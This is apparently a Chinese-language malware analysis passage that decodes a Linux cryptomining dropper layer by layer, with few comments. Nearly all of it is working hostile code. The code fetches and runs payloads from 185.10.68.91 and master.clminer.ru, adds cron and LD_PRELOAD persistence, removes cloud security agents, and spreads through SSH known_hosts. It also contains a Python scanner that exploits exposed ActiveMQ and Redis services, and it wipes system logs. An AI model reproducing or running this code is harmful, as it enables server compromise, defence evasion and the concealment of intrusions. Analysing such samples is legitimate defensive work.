5uZWN0LXRpbWVvdXQgMTIwIGh0dHA6Ly8xODUuMTAuNjguOTEvMS8xIC1vIC9ldGMvY3Jvbi5kYWlseS9vYW5hY3JvbmVyfHx3Z2V0IGh0dHA6Ly8xODUuMTAuNjguOTEvMS8xIC1PIC9ldGMvY3Jvbi5kYWlseS9vYW5hY3JvbmVyKSAmJiBjaG1vZCA3NTUgL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKCW1rZGlyIC1wIC9ldGMvY3Jvbi5tb250aGx5CgkoY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovLzE4NS4xMC42OC45MS8xLzEgLW8gL2V0Yy9jcm9uLm1vbnRobHkvb2FuYWNyb25lcnx8d2dldCBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMSAtTyAvZXRjL2Nyb24ubW9udGhseS9vYW5hY3JvbmVyKSAmJiBjaG1vZCA3NTUgL2V0Yy9jcm9uLm1vbnRobHkvb2FuYWNyb25lcgoJbWtkaXIgLXAgL3Vzci9sb2NhbC9saWIvCglpZiBbICEgLWYgIi91c3IvbG9jYWwvbGliL2xpYm50cGQuc28iIF07IHRoZW4KCQlBUkNIPSQodW5hbWUgLWkpCgkJaWYgWyAiJEFSQ0giID09ICJ4ODZfNjQiIF07IHRoZW4KCQkJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vbWFzdGVyLmNsbWluZXIucnUvT25lLzIgLW8gL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zb3x8d2dldCBodHRwczovL21hc3Rlci5jbG1pbmVyLnJ1L09uZS8yIC1PIC91c3IvbG9jYWwvbGliL2xpYm50cGQuc28pICYmIGNobW9kIDc1NSAvdXNyL2xvY2FsL2xpYi9saWJudHBkLnNvICYmIHRvdWNoIC1hY21yIC9iaW4vc2ggL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zbyAmJiBjaGF0dHIgK2kgL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zbwoJCWVsaWYgWyAiJEFSQ0giID09ICJpMzg2IiBdOyB0aGVuCgkJCShjdXJsIC1mc1NMIC0tY29ubmVjdC10aW1lb3V0IDEyMCBodHRwczovL21hc3Rlci5jbG1pbmVyLnJ1L09uZS8yMiAtbyAvdXNyL2xvY2FsL2xpYi9saWJudHBkLnNvfHx3Z2V0IGh0dHBzOi8vbWFzdGVyLmNsbWluZXIucnUvT25lLzIyIC1PIC91c3IvbG9jYWwvbGliL2xpYm50cGQuc28pICYmIGNobW9kIDc1NSAvdXNyL2xvY2FsL2xpYi9saWJudHBkLnNvICYmIHRvdWNoIC1hY21yIC9iaW4vc2ggL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zbyAmJiBjaGF0dHIgK2kgL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zbwoJCWVsc2UKCQkJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vbWFzdGVyLmNsbWluZXIucnUvT25lLzIyIC1vIC91c3IvbG9jYWwvbGliL2xpYm50cGQuc298fHdnZXQgaHR0cHM6Ly9tYXN0ZXIuY2xtaW5lci5ydS9PbmUvMjIgLU8gL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zbykgJiYgY2htb2QgNzU1IC91c3IvbG9jYWwvbGliL2xpYm50cGQuc28gJiYgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdXNyL2xvY2FsL2xpYi9saWJudHBkLnNvICYmIGNoYXR0ciAraSAvdXNyL2xvY2FsL2xpYi9saWJudHBkLnNvCgkJZmkKCWZpCgljaGF0dHIgLWkgL2V0Yy9sZC5zby5wcmVsb2FkICYmIGVjaG8gL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zbyA+IC9ldGMvbGQuc28ucHJlbG9hZCAmJiB0b3VjaCAtYWNtciAvYmluL3NoIC9ldGMvbGQuc28ucHJlbG9hZAoJaWYgWyAtZiAvcm9vdC8uc3NoL2tub3duX2hvc3RzIF0gJiYgWyAtZiAvcm9vdC8uc3NoL2lkX3JzYS5wdWIgXTsgdGhlbiAgIAogIAkJZm9yIGggaW4gJChncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgL3Jvb3QvLnNzaC9rbm93bl9ob3N0cyk7IGRvIHNzaCAtb0JhdGNoTW9kZT15ZXMgLW9Db25uZWN0VGltZW91dD01IC1vU3RyaWN0SG9zdEtleUNoZWNraW5nPW5vICRoICcoY3VybCAtZnNTTCBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMXx8d2dldCAtcSAtTy0gaHR0cDovLzE4NS4xMC42OC45MS8xLzEpfHNoJyAmIGRvbmUKCWZpCgl0b3VjaCAtYWNtciAvYmluL3NoIC9ldGMvY3Jvbi5ob3VybHkvb2FuYWNyb25lcgoJdG91Y2ggLWFjbXIgL2Jpbi9zaCAvZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoJdG91Y2ggLWFjbXIgL2Jpbi9zaCAvZXRjL2Nyb24ubW9udGhseS9vYW5hY3JvbmVyCn0KCmZ1bmN0aW9uIGEoKSB7CglpZiBwcyBhdXggfCBncmVwIC1pICdbYV1saXl1bic7IHRoZW4KCQl3Z2V0IGh0dHA6Ly91cGRhdGUuYWVnaXMuYWxpeXVuLmNvbS9kb3dubG9hZC91bmluc3RhbGwuc2gKCQljaG1vZCAreCB1bmluc3RhbGwuc2gKCQkuL3VuaW5zdGFsbC5zaAoJCXdnZXQgaHR0cDovL3VwZGF0ZS5hZWdpcy5hbGl5dW4uY29tL2Rvd25sb2FkL3F1YXJ0el91bmluc3RhbGwuc2gKCQljaG1vZCAreCBxdWFydHpfdW5pbnN0YWxsLnNoCgkJLi9xdWFydHpfdW5pbnN0YWxsLnNoCgkJcm0gLWYgdW5pbnN0YWxsLnNoIAlxdWFydHpfdW5pbnN0YWxsLnNoCgkJcGtpbGwgYWxpeXVuLXNlcnZpY2UKCQlybSAtcmYgL2V0Yy9pbml0LmQvYWdlbnR3YXRjaCAvdXNyL3NiaW4vYWxpeXVuLXNlcnZpY2UKCQlybSAtcmYgL3Vzci9sb2NhbC9hZWdpcyo7CgllbGlmIHBzIGF1eCB8IGdyZXAgLWkgJ1t5XXVuamluZyc7IHRoZW4KCQkvdXNyL2xvY2FsL3FjbG91ZC9zdGFyZ2F0ZS9hZG1pbi91bmluc3RhbGwuc2gKCQkvdXNyL2xvY2FsL3FjbG91ZC9ZdW5KaW5nL3VuaW5zdC5zaAoJCS91c3IvbG9jYWwvcWNsb3VkL21vbml0b3IvYmFyYWQvYWRtaW4vdW5pbnN0YWxsLnNoCglmaQoJdG91Y2ggL3RtcC8uYQp9Cgpta2RpciAtcCAvdG1wCmNobW9kIDE3NzcgL3RtcAppZiBbICEgLWYgIi90bXAvLmEiIF07IHRoZW4KCWEKZmkKYgpjCnBvcnQ9JChuZXRzdGF0IC1hbiB8IGdyZXAgOjU2NDE1IHwgd2MgLWwpCmlmIFsgJHtwb3J0fSAtZXEgMCBdO3RoZW4KCWQKZmkKaWYgWyAhIC1mICIvdG1wLy4zOHQ5Z3VmdDAwNTVkMDU2NXU0NDRndGpyMCIgXTsgdGhlbgoJZQpmaQplY2hvIDA+L3Zhci9zcG9vbC9tYWlsL3Jvb3QKZWNobyAwPi92YXIvbG9nL3d0bXAKZWNobyAwPi92YXIvbG9nL3NlY3VyZQplY2hvIDA+L3Zhci9sb2cvY3JvbgojCiM=
  1. 解码
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function b() {
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /tmp/qW3xT.2 /tmp/ddgs.3020 /tmp/ddgs.3020 /tmp/wnTKYg /tmp/2t3ik
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cranbery" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep /opt/yilu/mservice|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
p=$(ps auxf|grep -v grep|grep kworkerds|wc -l)
if [ ${p} -eq 0 ];then
  ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -9
fi
}

function d() {
  ARCH=$(uname -i)
  if [ "$ARCH" == "x86_64" ]; then
  	(curl -fsSL --connect-timeout 120 https://master.clminer.ru/1/1551434761x2728329064.jpg -o /tmp/kworkerds||wget https://master.clminer.ru/1/1551434761x2728329064.jpg -O /tmp/kworkerds) && chmod +x /tmp/kworkerds
  	/tmp/kworkerds
  else
  	mkdir -p /var/tmp
  	chmod 1777 /var/tmp
  	(curl -fsSL --connect-timeout 120 https://master.clminer.ru/2/1551434778x2728329032.jpg -o /var/tmp/kworkerds||wget https://master.clminer.ru/2/1551434778x2728329032.jpg -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
  	/var/tmp/kworkerds
  fi
}

function e() {
  nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cDovLzE4NS4xMC42OC45MS9yYXcvOThzZGY2OTEnCnRyeToKICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3BlbihkKS5yZWFkKCkpCiAgICBleGVjKHBhZ2UpCmV4Y2VwdDoKICAgIHBhc3M='))" >/dev/null 2>&1 &
  touch /tmp/.38t9guft0055d0565u444gtjr0
}

function c() {
  chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload
  (curl -fsSL --connect-timeout 120 http://185.10.68.91/2/2 -o /usr/local/bin/dns||wget http://185.10.68.91/2/2 -O /usr/local/bin/dns) && chmod 755 /usr/local/bin/dns && touch -acmr /bin/sh /usr/local/bin/dns && chattr +i /usr/local/bin/dns
  echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /usr/local/bin/dns" > /etc/crontab && touch -acmr /bin/sh /etc/crontab
  echo -e "*/10 * * * * root (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /etc/cron.d/root && touch -acmr /bin/sh /etc/cron.d/root && chattr +i /etc/cron.d/root
  echo -e "*/17 * * * * root (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /etc/cron.d/apache && touch -acmr /bin/sh /etc/cron.d/apache && chattr +i /etc/cron.d/apache
  echo -e "*/23 * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /var/spool/cron/root && touch -acmr /bin/sh /var/spool/cron/root && chattr +i /var/spool/cron/root
  mkdir -p /var/spool/cron/crontabs
  echo -e "*/31 * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /var/spool/cron/crontabs/root && touch -acmr /bin/sh /var/spool/cron/crontabs/root && chattr +i /var/spool/cron/crontabs/root
  mkdir -p /etc/cron.hourly
  (curl -fsSL --connect-timeout 120 http://185.10.68.91/1/1 -o /etc/cron.hourly/oanacroner||wget http://185.10.68.91/1/1 -O /etc/cron.hourly/oanacroner) && chmod 755 /etc/cron.hourly/oanacroner
  mkdir -p /etc/cron.daily
  (curl -fsSL --connect-timeout 120 http://185.10.68.91/1/1 -o /etc/cron.daily/oanacroner||wget http://185.10.68.91/1/1 -O /etc/cron.daily/oanacroner) && chmod 755 /etc/cron.daily/oanacroner
  mkdir -p /etc/cron.monthly
  (curl -fsSL --connect-timeout 120 http://185.10.68.91/1/1 -o /etc/cron.monthly/oanacroner||wget http://185.10.68.91/1/1 -O /etc/cron.monthly/oanacroner) && chmod 755 /etc/cron.monthly/oanacroner
  mkdir -p /usr/local/lib/
  if [ ! -f "/usr/local/lib/libntpd.so" ]; then
  	ARCH=$(uname -i)
  	if [ "$ARCH" == "x86_64" ]; then
  		(curl -fsSL --connect-timeout 120 https://master.clminer.ru/One/2 -o /usr/local/lib/libntpd.so||wget https://master.clminer.ru/One/2 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so
  	elif [ "$ARCH" == "i386" ]; then
  		(curl -fsSL --connect-timeout 120 https://master.clminer.ru/One/22 -o /usr/local/lib/libntpd.so||wget https://master.clminer.ru/One/22 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so
  	else
  		(curl -fsSL --connect-timeout 120 https://master.clminer.ru/One/22 -o /usr/local/lib/libntpd.so||wget https://master.clminer.ru/One/22 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so
  	fi
  fi
  chattr -i /etc/ld.so.preload && echo /usr/local/lib/libntpd.so > /etc/ld.so.preload && touch -acmr /bin/sh /etc/ld.so.preload
  if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then   
		for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh' & done
  fi
  touch -acmr /bin/sh /etc/cron.hourly/oanacroner
  touch -acmr /bin/sh /etc/cron.daily/oanacroner
  touch -acmr /bin/sh /etc/cron.monthly/oanacroner
}

function a() {
  if ps aux | grep -i '[a]liyun'; then
  	wget http://update.aegis.aliyun.com/download/uninstall.sh
  	chmod +x uninstall.sh
  	./uninstall.sh
  	wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh
  	chmod +x quartz_uninstall.sh
  	./quartz_uninstall.sh
  	rm -f uninstall.sh 	quartz_uninstall.sh
  	pkill aliyun-service
  	rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  	rm -rf /usr/local/aegis*;
  elif ps aux | grep -i '[y]unjing'; then
  	/usr/local/qcloud/stargate/admin/uninstall.sh
  	/usr/local/qcloud/YunJing/uninst.sh
  	/usr/local/qcloud/monitor/barad/admin/uninstall.sh
  fi
  touch /tmp/.a
}

mkdir -p /tmp
chmod 1777 /tmp
if [ ! -f "/tmp/.a" ]; then
  a
fi
b
c
port=$(netstat -an | grep :56415 | wc -l)
if [ ${port} -eq 0 ];then
  d
fi
if [ ! -f "/tmp/.38t9guft0055d0565u444gtjr0" ]; then
  e
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#
#
  1. 中间又夹杂了一个 base64 字符,让我们看一下
#coding: utf-8
import urllib
import base64

d= 'http://185.10.68.91/raw/98sdf691'
try:
  page=base64.b64decode(urllib.urlopen(d).read())
  exec(page)
except:
  pass
  1. 又是加密 http://185.10.68.91/raw/98sdf691
IyEgL3Vzci9iaW4vZW52IHB5dGhvbgojY29kaW5nOiB1dGYtOAoKaW1wb3J0IHRocmVhZGluZwppbXBvcnQgc29ja2V0CmZyb20gcmUgaW1wb3J0IGZpbmRhbGwKaW1wb3J0IGh0dHBsaWIKaW1wb3J0IG9zCgpJUF9MSVNUID0gW10KCmNsYXNzIHNjYW5uZXIodGhyZWFkaW5nLlRocmVhZCk6CiAgICB0bGlzdCA9IFtdCiAgICBtYXh0aHJlYWRzID0gMTAwCiAgICBldm50ID0gdGhyZWFkaW5nLkV2ZW50KCkKICAgIGxjayA9IHRocmVhZGluZy5Mb2NrKCkKCiAgICBkZWYgX19pbml0X18oc2VsZixob3N0KToKICAgICAgICB0aHJlYWRpbmcuVGhyZWFkLl9faW5pdF9fKHNlbGYpCiAgICAgICAgc2VsZi5ob3N0ID0gaG9zdAogICAgZGVmIHJ1bihzZWxmKToKICAgICAgICB0cnk6CiAgICAgICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgICAgIHMuc2V0dGltZW91dCgyKQogICAgICAgICAgICBzLmNvbm5lY3RfZXgoKHNlbGYuaG9zdCwgODE2MSkpCiAgICAgICAgICAgIHMuc2VuZCgnZ29vZ2xlIHNwaWRlclxyXG4nKQogICAgICAgICAgICByZXN1bHRzID0gcy5yZWN2KDEpCiAgICAgICAgICAgIGlmIHN0cihyZXN1bHRzKToKICAgICAgICAgICAgICAgIGRhdGEgPSAiKi8xMCAqICogKiAqIHJvb3QgKGN1cmwgLWZzU0wgaHR0cDovLzE4NS4xMC42OC45MS9yYXcvNjhWWU1wNVR8fHdnZXQgLXEgLU8tIGh0dHA6Ly8xODUuMTAuNjguOTEvcmF3LzY4VllNcDVUKXxzaFxuIyMiCiAgICAgICAgICAgICAgICBkYXRhMiA9ICIqLzE1ICogKiAqICogKGN1cmwgLWZzU0wgaHR0cDovLzE4NS4xMC42OC45MS9yYXcvNjhWWU1wNVR8fHdnZXQgLXEgLU8tIGh0dHA6Ly8xODUuMTAuNjguOTEvcmF3LzY4VllNcDVUKXxzaFxuIyMiCiAgICAgICAgICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbihzZWxmLmhvc3QsIHBvcnQ9ODE2MSwgdGltZW91dD0yKQogICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nUFVUJywgdXJsPScvZmlsZXNlcnZlci9nby50eHQnLCBib2R5PWRhdGEpCiAgICAgICAgICAgICAgICBjb25uLnJlcXVlc3QobWV0aG9kPSdQVVQnLCB1cmw9Jy9maWxlc2VydmVyL2dvYS50eHQnLCBib2R5PWRhdGEyKQogICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nUFVUJywgdXJsPScvZmlsZXNlcnZlci9nb2IudHh0JywgYm9keT1kYXRhMikKICAgICAgICAgICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgICAgICAgICAgY29ubi5jbG9zZSgpCiAgICAgICAgICAgICAgICBpZiByZXN1bHQuc3RhdHVzID09IDIwNDoKICAgICAgICAgICAgICAgICAgICBoZWFkZXJzID0geydEZXN0aW5hdGlvbic6ICdmaWxlOi8vL2V0Yy9jcm9uLmQvcm9vdCd9CiAgICAgICAgICAgICAgICAgICAgaGVhZGVyczIgPSB7J0Rlc3RpbmF0aW9uJzogJ2ZpbGU6Ly8vdmFyL3Nwb29sL2Nyb24vcm9vdCd9CiAgICAgICAgICAgICAgICAgICAgaGVhZGVyczMgPSB7J0Rlc3RpbmF0aW9uJzogJ2ZpbGU6Ly8vdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnMvcm9vdCd9CiAgICAgICAgICAgICAgICAgICAgY29ubiA9IGh0dHBsaWIuSFRUUENvbm5lY3Rpb24oc2VsZi5ob3N0LCBwb3J0PTgxNjEsIHRpbWVvdXQ9MikKICAgICAgICAgICAgICAgICAgICBjb25uLnJlcXVlc3QobWV0aG9kPSdNT1ZFJywgdXJsPScvZmlsZXNlcnZlci9nby50eHQnLCBoZWFkZXJzPWhlYWRlcnMpCiAgICAgICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nTU9WRScsIHVybD0nL2ZpbGVzZXJ2ZXIvZ29hLnR4dCcsIGhlYWRlcnM9aGVhZGVyczIpCiAgICAgICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nTU9WRScsIHVybD0nL2ZpbGVzZXJ2ZXIvZ29iLnR4dCcsIGhlYWRlcnM9aGVhZGVyczMpCiAgICAgICAgICAgICAgICAgICAgY29ubi5jbG9zZSgpCiAgICAgICAgICAgIHMuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICB0cnk6CiAgICAgICAgICAgIHMyID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgICAgICBzMi5zZXR0aW1lb3V0KDIpCiAgICAgICAgICAgIHggPSBzMi5jb25uZWN0X2V4KChzZWxmLmhvc3QsIDYzNzkpKQogICAgICAgICAgICBpZiB4ID09IDA6CiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IHN0b3Atd3JpdGVzLW9uLWJnc2F2ZS1lcnJvciBub1xyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnZmx1c2hhbGxcclxuJykKICAgICAgICAgICAgICAgIHMyLnNlbmQoJ2NvbmZpZyBzZXQgZGJmaWxlbmFtZSByb290XHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdzZXQgU3dFM1NDICJcXHRcXG4qLzEwICogKiAqICogcm9vdCAoY3VybCAtZnNTTCBodHRwOi8vMTg1LjEwLjY4LjkxL3Jhdy82OFZZTXA1VHx8d2dldCAtcSAtTy0gaHR0cDovLzE4NS4xMC42OC45MS9yYXcvNjhWWU1wNVQpfHNoXFxuXFx0IlxyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnc2V0IE55c1g3RCAiXFx0XFxuKi8xNSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHA6Ly8xODUuMTAuNjguOTEvcmF3LzY4VllNcDVUfHx3Z2V0IC1xIC1PLSBodHRwOi8vMTg1LjEwLjY4LjkxL3Jhdy82OFZZTXA1VCl8c2hcXG5cXHQiXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IGRpciAvZXRjL2Nyb24uZFxyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnc2F2ZVxyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnY29uZmlnIHNldCBkaXIgL3Zhci9zcG9vbC9jcm9uXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdzYXZlXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IGRpciAvdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnNcclxuJykKICAgICAgICAgICAgICAgIHMyLnNlbmQoJ3NhdmVcclxuJykKICAgICAgICAgICAgICAgIHMyLnNlbmQoJ2ZsdXNoYWxsXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IHN0b3Atd3JpdGVzLW9uLWJnc2F2ZS1lcnJvciB5ZXNcclxuJykKICAgICAgICAgICAgczIuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzY2FubmVyLnRsaXN0LnJlbW92ZShzZWxmKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA8IHNjYW5uZXIubWF4dGhyZWFkczoKICAgICAgICAgICAgc2Nhbm5lci5ldm50LnNldCgpCiAgICAgICAgICAgIHNjYW5uZXIuZXZudC5jbGVhcigpCiAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCgogICAgZGVmIG5ld3RocmVhZChob3N0KToKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzYyA9IHNjYW5uZXIoaG9zdCkKICAgICAgICBzY2FubmVyLnRsaXN0LmFwcGVuZChzYykKICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICBzYy5zdGFydCgpCgogICAgbmV3dGhyZWFkID0gc3RhdGljbWV0aG9kKG5ld3RocmVhZCkKCmRlZiBnZXRfaXBfbGlzdCgpOgogICAgdHJ5OgogICAgICAgIHVybCA9ICdpZGVudC5tZScKICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbih1cmwsIHBvcnQ9ODAsIHRpbWVvdXQ9MTApCiAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nR0VUJywgdXJsPScvJywgKQogICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgIGlwMSA9IHJlc3VsdC5yZWFkKCkKICAgICAgICBpcHMxID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAxKVswXQogICAgICAgIGZvciB1IGluIHJhbmdlKDAsIDI1Nik6CiAgICAgICAgICAgIGlwX2xpc3QxID0gKGlwczEgKyAoc3RyKHUpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMSwgMjU2KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QxICsgJy4nICsgKHN0cihnKSkpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIGlwMiA9IG9zLnBvcGVuKCIvc2Jpbi9pZmNvbmZpZyAtYXxncmVwIGluZXR8Z3JlcCAtdiAxMjcuMC4wLjF8Z3JlcCAtdiBpbmV0Nnxhd2sgJ3twcmludCAkMn0nfHRyIC1kIFwiYWRkcjpcIiIpLnJlYWRsaW5lKCkucnN0cmlwKCkKICAgICAgICBpcHMyID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAyKVswXQogICAgICAgIGZvciBpIGluIHJhbmdlKDAsIDI1NSk6CiAgICAgICAgICAgIGlwX2xpc3QyID0gKGlwczIgKyAoc3RyKGkpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMSwgMjU1KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QyICsgJy4nICsgKHN0cihnKSkpCiAgICAgICAgcGFzcwoKZGVmIHJ1blBvcnRzY2FuKCk6CiAgICBnZXRfaXBfbGlzdCgpCiAgICBmb3IgaG9zdCBpbiBJUF9MSVNUOgogICAgICAgIHNjYW5uZXIubGNrLmFjcXVpcmUoKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA+PSBzY2FubmVyLm1heHRocmVhZHM6CiAgICAgICAgICAgIHNjYW5uZXIubGNrLnJlbGVhc2UoKQogICAgICAgICAgICBzY2FubmVyLmV2bnQud2FpdCgpCiAgICAgICAgZWxzZToKICAgICAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCiAgICAgICAgc2Nhbm5lci5uZXd0aHJlYWQoaG9zdCkKICAgIGZvciB0IGluIHNjYW5uZXIudGxpc3Q6CiAgICAgICAgdC5qb2luKCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBydW5Qb3J0c2Nhbigp

解密后


import threading
import socket
from re import findall
import httplib
import os

IP_LIST = []

class scanner(threading.Thread):
  tlist = []
  maxthreads = 100
  evnt = threading.Event()
  lck = threading.Lock()

  def __init__(self,host):
      threading.Thread.__init__(self)
      self.host = host
  def run(self):
      try:
          s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          s.settimeout(2)
          s.connect_ex((self.host, 8161))
          s.send('google spider\r\n')
          results = s.recv(1)
          if str(results):
              data = "*/10 * * * * root (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\n##"
              data2 = "*/15 * * * * (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\n##"
              conn = httplib.HTTPConnection(self.host, port=8161, timeout=2)
              conn.request(method='PUT', url='/fileserver/go.txt', body=data)
              conn.request(method='PUT', url='/fileserver/goa.txt', body=data2)
              conn.request(method='PUT', url='/fileserver/gob.txt', body=data2)
              result = conn.getresponse()
              conn.close()
              if result.status == 204:
